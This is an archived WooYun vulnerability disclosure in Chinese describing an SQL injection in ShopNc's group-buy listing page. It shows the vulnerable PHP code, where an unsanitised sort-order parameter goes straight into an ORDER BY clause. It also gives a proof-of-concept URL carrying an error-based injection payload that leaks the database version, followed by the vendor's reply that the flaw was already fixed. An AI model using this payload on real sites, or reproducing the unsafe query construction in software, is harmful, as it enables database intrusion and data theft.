乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-06: 细节已通知厂商并且等待厂商处理中 2014-04-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-06-02: 细节向核心白帽子及相关领域专家公开 2014-06-12: 细节向普通白帽子公开 2014-06-22: 细节向实习白帽子公开 2014-07-02: 细节向公众公开
ShopNc注入漏洞
/control/show_groupby.phppublic function groupbuy_listOp() { $g_cache = ($cache = F('groupbuy'))? $cache : H('groupbuy',true,'file'); //获取当前进行中的团购活动 $template_in_progress = $this->get_groupbuy_template_list('in_progress'); Tpl::output('groupbuy_template',$template_in_progress[0]); //输出倒计时 $this->output_count_down($template_in_progress[0]['end_time']); //分页 $page = new Page(); $page->setEachNum(9) ; $page->setStyle('admin') ; //获取正在进行中的团购列表 $param = array(); $param['area_id'] = intval($_GET['groupbuy_area']); if(empty($param['area_id'])) { if(cookie('groupbuy_area')) { $area_array = explode(',',cookie('groupbuy_area')); $param['area_id'] = intval($area_array[0]); } } $param['class_id'] = intval($_GET['groupbuy_class']); if(intval($_GET['groupbuy_price']) !== 0) { $price_range_list = $g_cache['price']; foreach($price_range_list as $price_range) { if($price_range['range_id'] == $_GET['groupbuy_price']) { $param['greater_than_groupbuy_price'] = $price_range['range_end']; $param['less_than_groupbuy_price'] = $price_range['range_start']; } } } $groupbuy_order_key = trim($_GET['groupbuy_order_key']); $groupbuy_order = empty($_GET['groupbuy_order'])?'desc':trim($_GET['groupbuy_order']);//获取参数 if(!empty($groupbuy_order_key)) { switch ($groupbuy_order_key) { case 'price': $param['order'] = 'state asc,groupbuy_price '.$groupbuy_order;//带入ORDER 语句 break; case 'rebate': $param['order'] = 'state asc,rebate '.$groupbuy_order; break; case 'sale': $param['order'] = 'state asc,buyer_count '.$groupbuy_order;
测试方法http://127.0.0.1/shopnc/index.php?act=show_groupbuy&op=groupbuy_list&id=1&groupbuy_order_key=price&groupbuy_order=%20%20and%20%28select%201%20from%20%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20%20information_schema.tables%20group%20by%20x%29a%29%20--
你猜
危害等级:无影响厂商忽略
忽略时间:2014-07-02 14:15
谢谢Matt,这个漏洞在去年已经修复过了,建议从官网下载最新版测试
暂无